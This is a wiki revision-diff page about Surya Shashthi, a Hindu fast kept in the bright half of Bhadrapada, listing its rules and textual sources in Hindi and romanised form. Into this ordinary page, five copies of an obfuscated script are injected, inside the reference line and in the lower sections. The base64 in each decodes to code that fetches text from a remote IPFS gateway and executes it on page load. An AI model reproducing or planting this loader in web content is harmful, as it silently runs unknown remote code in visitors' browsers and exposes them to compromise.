Difference between revisions of "सूर्य षष्ठी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
 
(6 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भाद्रपद]] [[शुक्ल पक्ष]] में [[प्रतिपदा]] से [[पंचमी]] तक एकभक्त रहना चाहिए।
 
*[[भाद्रपद]] [[शुक्ल पक्ष]] में [[प्रतिपदा]] से [[पंचमी]] तक एकभक्त रहना चाहिए।
 
*[[षष्ठी]] को उपवास करना चाहिए।
 
*[[षष्ठी]] को उपवास करना चाहिए।
Line 5: Line 5:
 
*यह व्रत एक वर्ष तक करना चाहिए।
 
*यह व्रत एक वर्ष तक करना चाहिए।
 
*प्रत्येक [[मास]] में [[आदित्य देवता|आदित्य]] के विभिन्न नाम का जाप करना चाहिए।
 
*प्रत्येक [[मास]] में [[आदित्य देवता|आदित्य]] के विभिन्न नाम का जाप करना चाहिए।
*अन्त में विस्तृत उद्यापन करना चाहिए।<ref> हेमाद्रि (व्रतखण्ड 1, 608-615, भविष्योत्तरपुराण से उद्धरण); निर्णयसिन्धु (134)</ref>
+
*अन्त में विस्तृत उद्यापन करना चाहिए।<ref> हेमाद्रि (व्रतखण्ड 1, 608-615, भविष्योत्तरपुराण से उद्धरण); निर्णयसिन्धु (134</ref>
  
{{लेख प्रगति
+
{{seealso|छठपूजा}}
|आधार=आधार1
+
 
|प्रारम्भिक=
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{पर्व और त्योहार}}
+
{{पर्व और त्योहार}}{{व्रत और उत्सव}}
{{व्रत और उत्सव}}
+
[[Category:व्रत और उत्सव]][[Category:संस्कृति कोश]][[Category:पर्व और त्योहार]]
 
 
[[Category:व्रत और उत्सव]]
 
[[Category:संस्कृति कोश]]  
 
[[Category:पर्व और त्योहार]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 06:07, 7 November 2013

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • bhadrapad shukl paksh mean pratipada se panchami tak ekabhakt rahana chahie.
  • shashthi ko upavas karana chahie.
  • soory pratima ki pooja karana chahie.
  • yah vrat ek varsh tak karana chahie.
  • pratyek mas mean adity ke vibhinn nam ka jap karana chahie.
  • ant mean vistrit udyapan karana chahie.[1]
  1. REDIRECTsaancha:inhean bhi dekhean<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vratakhand 1, 608-615, bhavishyottarapuran se uddharan); nirnayasindhu (134

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>